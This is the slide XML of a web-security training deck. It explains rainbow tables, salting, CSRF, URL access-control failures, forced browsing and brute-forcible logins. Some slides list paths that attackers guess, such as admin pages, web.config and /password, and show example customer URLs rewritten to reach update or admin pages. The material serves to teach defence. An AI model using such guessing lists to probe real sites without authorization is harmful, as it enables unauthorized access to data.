        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="62726"/>
            <a:ext cx="13004801" cy="7047954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1761" name="To generate the table, we choose a random set of initial passwords.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151313" y="7495520"/>
            <a:ext cx="12823203" cy="119684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914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>To generate the table, we choose a random set of initial passwords. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Store only the first and last password in each chain and none of the other passwords (or the hash values) would be stored.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1764" name="the reduction function maps hashes to plaintexts.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="11704322" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
            <a:r>
              <a:t> the reduction function maps hashes to plaintexts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
            <a:r>
              <a:t>It's important to note that it does the reverse of a hash function </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
            <a:r>
              <a:t>The only requirement for the reduction function is to be able to return a "plain text" value in a specific size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
            <a:r>
              <a:t>a hash of a plaintext might be MD5("493823") -&gt; “222f00dc4b7f9131c89cff641d1a8c50".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="404866" indent="-404866" defTabSz="795527">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3306"/>
            </a:pPr>
            <a:r>
              <a:t>In this case the reduction function R() might be as simple as taking the first six numbers from the hash; R("222f00dc4b7f9131c89cff641d1a8c50") -&gt; "222004".</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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7" name="Using A Rainbow Table"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Using A Rainbow Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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69" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2358448"/>
            <a:ext cx="13004801" cy="7186865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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72" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1207128"/>
            <a:ext cx="13004801" cy="733934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1" name="Engineering…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t>Engineering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t>v/s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t> Tuning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1" name="CSRF"/>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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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75" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1106261"/>
            <a:ext cx="13004801" cy="7541078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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78" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="882976"/>
            <a:ext cx="13004801" cy="7987649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="If at any point we observe a value matching one of the endpoints in the table, we get the corresponding starting point and use it to recreate the chain. There's a good chance that this chain will contain the value h, and if so, the immediately preceding value in the chain is the password"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> If at any point we observe a value matching one of the endpoints in the table, we get the corresponding starting point and use it to recreate the chain. There's a good chance that this chain will contain the value h, and if so, the immediately preceding value in the chain is the password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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84" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502722" y="-1"/>
            <a:ext cx="7999356" cy="9753601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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6" name="Salts"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Salts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1787" name="Must be unique!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Must be unique!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> - Per Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> - Globally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Should be random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> - Strong!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> - Reasonably long (at least 64 bits)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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0" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1791" name="SQL-Injection still gives us hash…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SQL-Injection still gives us hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> - And the salt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But the salt defeats rainbow tables...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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4" name="A8 : Failure to Restrict URL Access"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A8 : Failure to Restrict URL Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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7" name="Myth: If I host a page, but don't ever provide a link to it, it won't be found by hackers"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Myth: If I host a page, but don't ever provide a link to it, it won't be found by hackers </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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9" name="forced browsing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> forced browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1800" name="Automated tools guess links using common folders and page names…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>Automated tools guess links using common folders and page names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>user/add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>• admin/newuser.aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>• web.config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>• /log/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>• /password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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2" name="forced browsing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> forced browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1803" name="If we have URLs like:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>If we have URLs like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>tic.com/Customers/View/2148102445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>tic.com/Customers/ViewDetails.aspx?ID=2148102445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>o Attackers will try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>tic.com/Customers/Update/2148102445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>tic.com/Customers/Modify.aspx?ID=2148102445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>tic.com/Customers/admin</a:t>
            </a:r>
            <a:r>
              <a:t> </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3" name="Brute-Forcible Login"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="6200">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Brute-Forcible Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="If the application allows an attacker to make repeated login attempts with different passwords until the correct one is guessed, then it is highly vulnerable even to an amateur attacker who manually enters some common usernames and passwords into their browser."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="388620" indent="-388620" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If the application allows an attacker to make repeated login attempts with different passwords until the correct one is guessed, then it is highly vulnerable even to an amateur attacker who manually enters some common usernames and passwords into their browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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5" name="Ask yourself:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Ask yourself:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>• Is this page sensitive?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>• If so, how should it be protected by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>authentication and authorization?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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7" name="Protect things that aren't pages"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="490727">
              <a:defRPr sz="6719"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Protect things that aren't pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1808" name="Don't forget about:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>Don't forget about:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>o AJAX methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>o Web services &amp; methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>o Configuration files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• web.config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• global.asax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• database files (*.mdf, *.mdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• Hibernate.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• SiteMap.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
